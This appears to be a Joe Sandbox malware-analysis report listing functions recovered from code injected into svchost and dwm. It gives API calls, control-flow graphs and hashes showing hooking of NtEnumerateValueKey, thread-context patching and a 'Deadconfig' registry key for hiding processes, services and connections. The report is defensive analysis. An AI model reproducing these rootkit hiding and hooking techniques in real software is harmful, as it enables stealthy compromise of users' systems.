                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 9142d0e90a15875c23e2ef622068383e6720854bda89ff63b14601dbed6587ad
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 52110D32614B4482EB118F15E848359B7E9F789FA4F1C4221DE8D17754DF3DC555CB41
                                                        Function 000002A66130D77C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: c3e01dfff161a5976bd281dc4611083f0f7a3eb579575d7db59aa67312c1ec9c
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: 96F08225B04B8083EB149B51F44D69976A8AB4AF90F4C9129E90B23B95CF3CC44DC742
                                                        Function 000002A66130D728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 000002A66130D751
                                                        • TlsSetValue.KERNEL32(?,?,?,000002A66130B50E,?,?,?,000002A66130B969,?,?,?,?,000002A66130BA1D), ref: 000002A66130D768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 99ba0b0960493b7701356cd3252ef2e8c1eec5ecfecca4cb90bae358581854c4
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: 35E06565B0054093EA445B50F54D2D832A9A74AF85F5C8025E507273D5DF3CC44DC242
                                                        Function 000002A661301C28 Relevance: 5.0, APIs: 4, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 4ac3e3435bc240a28e372e584974f9dd1de5cdb4271dbca95e4a4b138f6a69e4
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: 9C11C621B00B9082EE15DB66940D159B7F4FB8AFA5F5D4224DE5A63794EF3CC046C340
                                                        Function 000002A661301268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: 63ff9d481e95397834e2372ea7ee673de7580b85bc3560669ddf9eae868a6466
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: FEE0C271B11A4087E708EBA2D81D3597BE5EB8AF69F498024C94A07360DF7D849D8B91
                                                        Function 000002A661301000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: eaafdf4d04fa0db3b3ce82b686db906f9ee0fc88b57b7922fe41d943d2117609
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: 63E0E571B11A4087E708EB62D80D25977B5FF8AF25F488034C90A07320EF3C849D8A11

                                                        Executed Functions

                                                        Function 000002BAAF2129B0 Relevance: 3.1, APIs: 2, Instructions: 64nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 263 2baaf2129b0-2baaf2129f9 NtEnumerateValueKey 264 2baaf2129fb-2baaf2129fe 263->264 265 2baaf212a54-2baaf212a72 263->265 264->265 266 2baaf212a00-2baaf212a02 264->266 267 2baaf212a04-2baaf212a06 266->267 267->265 268 2baaf212a08-2baaf212a2d NtEnumerateValueKey 267->268 269 2baaf212a2f-2baaf212a32 268->269 270 2baaf212a3e 268->270 271 2baaf212a34-2baaf212a36 269->271 272 2baaf212a38-2baaf212a3c 269->272 273 2baaf212a42-2baaf212a49 call 2baaf213c70 270->273 271->273 272->273 276 2baaf212a4b 273->276 277 2baaf212a4d-2baaf212a52 273->277 276->277 277->265 277->267
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: EnumerateValue
                                                        • String ID:
                                                        • API String ID: 1749906896-0
                                                        • Opcode ID: c7d29f1da1c35067c358ffcc45280992f1212d67cf94ff1f26cc45362ca16225
                                                        • Instruction ID: 7309408ef0226acababe7e25447eca8a469459f1eac334046bf6cb404a325249
                                                        • Opcode Fuzzy Hash: c7d29f1da1c35067c358ffcc45280992f1212d67cf94ff1f26cc45362ca16225
                                                        • Instruction Fuzzy Hash: E811813730479082EB78DB1AB85461BB3B4F388B94F444225EE89C7794EF35C88AC759
                                                        Function 000002BAAF211628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 4199209b2c061b582fd17b60a4ec86ce2575602945635b3da4a1a40c26b59254
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 6F712E37710A1086EB249F75E86869D37B8FB84B88F001121DE4DC7B69DF3AC949C769
                                                        Function 000002BAAF215F50 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 51 2baaf215f50-2baaf215f77 52 2baaf215f8b-2baaf215f96 GetCurrentThreadId 51->52 53 2baaf215f79-2baaf215f88 51->53 54 2baaf215fa2-2baaf215fa9 52->54 55 2baaf215f98-2baaf215f9d 52->55 53->52 57 2baaf215fbb-2baaf215fcf 54->57 58 2baaf215fab-2baaf215fb6 call 2baaf215d80 54->58 56 2baaf2163cf-2baaf2163e6 call 2baaf217d60 55->56 59 2baaf215fde-2baaf215fe4 57->59 58->56 62 2baaf215fea-2baaf215ff3 59->62 63 2baaf2160b5-2baaf2160d6 59->63 66 2baaf21603a-2baaf2160ad call 2baaf214930 call 2baaf2148d0 call 2baaf214890 62->66 67 2baaf215ff5-2baaf216038 call 2baaf2189d0 62->67 69 2baaf2160dc-2baaf2160fc GetThreadContext 63->69 70 2baaf21623f-2baaf216250 call 2baaf2178df 63->70 80 2baaf2160b0 66->80 67->80 73 2baaf21623a 69->73 74 2baaf216102-2baaf216123 69->74 83 2baaf216255-2baaf21625b 70->83 73->70 74->73 82 2baaf216129-2baaf216132 74->82 80->59 86 2baaf2161b2-2baaf2161c3 82->86 87 2baaf216134-2baaf216145 82->87 88 2baaf21631e-2baaf21632e 83->88 89 2baaf216261-2baaf2162b8 VirtualProtect FlushInstructionCache 83->89 97 2baaf216235 86->97 98 2baaf2161c5-2baaf2161e3 86->98 93 2baaf2161ad 87->93 94 2baaf216147-2baaf21615c 87->94 91 2baaf21633e-2baaf21634a call 2baaf215210 88->91 92 2baaf216330-2baaf216337 88->92 95 2baaf2162ba-2baaf2162c4 89->95 96 2baaf2162e9-2baaf216319 call 2baaf217ccc 89->96 112 2baaf21634f-2baaf216355 91->112 92->91 100 2baaf216339 call 2baaf214800 92->100 93->97 94->93 102 2baaf21615e-2baaf2161a8 call 2baaf213d90 SetThreadContext 94->102 95->96 103 2baaf2162c6-2baaf2162e1 call 2baaf2147b0 95->103 96->83 98->97 104 2baaf2161e5-2baaf216230 call 2baaf213d20 call 2baaf2178fd 98->104 100->91 102->93 103->96 104->97 116 2baaf216397-2baaf2163b5 112->116 117 2baaf216357-2baaf216395 ResumeThread call 2baaf217ccc 112->117 120 2baaf2163b7-2baaf2163c6 116->120 121 2baaf2163c9 116->121 117->112 120->121 121->56
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: faa3aef994f2735bfefa3d52832d19c5bb0a04f7c42f0d6d3c76493ec733b772
                                                        • Instruction ID: 853f7b503d2c817fc64b2ab44f2c7e3111b18f7eeda597877c84b76580ded37a
                                                        • Opcode Fuzzy Hash: faa3aef994f2735bfefa3d52832d19c5bb0a04f7c42f0d6d3c76493ec733b772
                                                        • Instruction Fuzzy Hash: 69D19C77208B8881DA749B16E4A835E7BB0F3C8B84F540116EACD87BA5CF3DC545CB19
                                                        Function 000002BAAF2154F0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 123 2baaf2154f0-2baaf21551c 124 2baaf21552d-2baaf215536 123->124 125 2baaf21551e-2baaf215526 123->125 126 2baaf215547-2baaf215550 124->126 127 2baaf215538-2baaf215540 124->127 125->124 128 2baaf215561-2baaf21556a 126->128 129 2baaf215552-2baaf21555a 126->129 127->126 130 2baaf21556c-2baaf215571 128->130 131 2baaf215576-2baaf215581 GetCurrentThreadId 128->131 129->128 132 2baaf215af3-2baaf215afa 130->132 133 2baaf21558d-2baaf215594 131->133 134 2baaf215583-2baaf215588 131->134 135 2baaf2155a1-2baaf2155aa 133->135 136 2baaf215596-2baaf21559c 133->136 134->132 137 2baaf2155ac-2baaf2155b1 135->137 138 2baaf2155b6-2baaf2155c2 135->138 136->132 137->132 139 2baaf2155ee-2baaf215645 call 2baaf215b00 * 2 138->139 140 2baaf2155c4-2baaf2155e9 138->140 145 2baaf21565a-2baaf215663 139->145 146 2baaf215647-2baaf21564e 139->146 140->132 149 2baaf215675-2baaf21567e 145->149 150 2baaf215665-2baaf215672 145->150 147 2baaf215650 146->147 148 2baaf215656 146->148 153 2baaf2156d0-2baaf2156d6 147->153 148->145 154 2baaf2156c6-2baaf2156ca 148->154 151 2baaf215680-2baaf215690 149->151 152 2baaf215693-2baaf2156b8 call 2baaf217c90 149->152 150->149 151->152 162 2baaf21574d-2baaf215762 call 2baaf2140e0 152->162 163 2baaf2156be 152->163 156 2baaf215705-2baaf21570b 153->156 157 2baaf2156d8-2baaf2156f4 call 2baaf2147b0 153->157 154->153 160 2baaf21570d-2baaf21572c call 2baaf217ccc 156->160 161 2baaf215735-2baaf215748 156->161 157->156 166 2baaf2156f6-2baaf2156fe 157->166 160->161 161->132 170 2baaf215771-2baaf21577a 162->170 171 2baaf215764-2baaf21576c 162->171 163->154 166->156 172 2baaf21578c-2baaf2157da call 2baaf219080 170->172 173 2baaf21577c-2baaf215789 170->173 171->154 176 2baaf2157e2-2baaf2157ea 172->176 173->172 177 2baaf2157f0-2baaf2158db call 2baaf217860 176->177 178 2baaf2158f7-2baaf2158ff 176->178 189 2baaf2158dd 177->189 190 2baaf2158df-2baaf2158ee call 2baaf214480 177->190 180 2baaf215901-2baaf215914 call 2baaf2149b0 178->180 181 2baaf215943-2baaf21594b 178->181 192 2baaf215916 180->192 193 2baaf215918-2baaf215941 180->193 182 2baaf21594d-2baaf215955 181->182 183 2baaf215957-2baaf215966 181->183 182->183 186 2baaf215974-2baaf215981 182->186 187 2baaf21596f 183->187 188 2baaf215968 183->188 195 2baaf215983 186->195 196 2baaf215984-2baaf2159d9 call 2baaf2189d0 186->196 187->186 188->187 189->178 199 2baaf2158f0 190->199 200 2baaf2158f2 190->200 192->181 193->178 195->196 202 2baaf2159db-2baaf2159e3 196->202 203 2baaf2159e8-2baaf215a81 call 2baaf214930 call 2baaf214890 VirtualProtect 196->203 199->178 200->176 208 2baaf215a91-2baaf215af1 203->208 209 2baaf215a83-2baaf215a88 GetLastError 203->209 208->132 209->208
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 4fa86ef1d0c8a7d39dbdef65ae79680a6f267e5e3fe5a6c699418147f46d26ed
                                                        • Instruction ID: 908cd434262b72df167c1d4924d3ac3df06bb8f4633a7fd98c99c558dd714be6
                                                        • Opcode Fuzzy Hash: 4fa86ef1d0c8a7d39dbdef65ae79680a6f267e5e3fe5a6c699418147f46d26ed
                                                        • Instruction Fuzzy Hash: 4E02FB37219B8486EB64CB15F4A535AB7B0F3C5790F100116EA8E87BA8DF7DC488CB59
                                                        Function 000002BAAF213BB8 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 25c8acacec8528f1c12d002f9fa98adf4100eaee44a29a606b1e8c17c77e0aab
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: C6113C3670578082EF389B25E4682697371F748F94F040025DE8D87794EF3ECA48C729
                                                        Function 000002BAAF1E2AB8 Relevance: 6.2, APIs: 4, Instructions: 241memorylibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Protect$AllocLibraryLoad
                                                        • String ID:
                                                        • API String ID: 3316853933-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 80d34aad87d105a7e01ab1fbe1eb98c59553cb4cfa4e10ea0f142a24de0a8e9e
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 0B91E173B012D087EB688F25D068B79BBA1F754B94F5881269F4A8778CDB3DD842C721
                                                        Function 000002BAAF213E00 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: d67b081f5b52b9db25ef63bd3fc49ef94c05e675607d2408fbad0ef13c5677fc
                                                        • Instruction ID: df784ed3e95d42e3b42b8af3450d978266208cc608357a861d4930b189560f5c
                                                        • Opcode Fuzzy Hash: d67b081f5b52b9db25ef63bd3fc49ef94c05e675607d2408fbad0ef13c5677fc
                                                        • Instruction Fuzzy Hash: 6431FC33219B8081EE38DA15E06835B77B5F788784F500525B5CD86B98DF6EC948CB2E
                                                        Function 000002BAAF213618 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 000002BAAF213631
                                                        • PathFindFileNameW.SHLWAPI ref: 000002BAAF213640
                                                          • Part of subcall function 000002BAAF213C70: StrCmpNIW.SHLWAPI(?,?,?,000002BAAF21255A), ref: 000002BAAF213C88
                                                          • Part of subcall function 000002BAAF213BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213BC6
                                                          • Part of subcall function 000002BAAF213BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213BF4
                                                          • Part of subcall function 000002BAAF213BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213C16
                                                          • Part of subcall function 000002BAAF213BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213C34
                                                          • Part of subcall function 000002BAAF213BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213C55
                                                        • CreateThread.KERNELBASE ref: 000002BAAF213687
                                                          • Part of subcall function 000002BAAF211D3C: GetCurrentThread.KERNEL32 ref: 000002BAAF211D47
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: ef56faf1ccb545b8658d3fc8c7fdfc82085f98ac0f5421c0dde815119c8e5451
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: 5B11693261064086FF7CAB20A53D35A37B6A754344F804525A806C6290EF7BC94CC63E
                                                        Function 000002BAAF215210 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
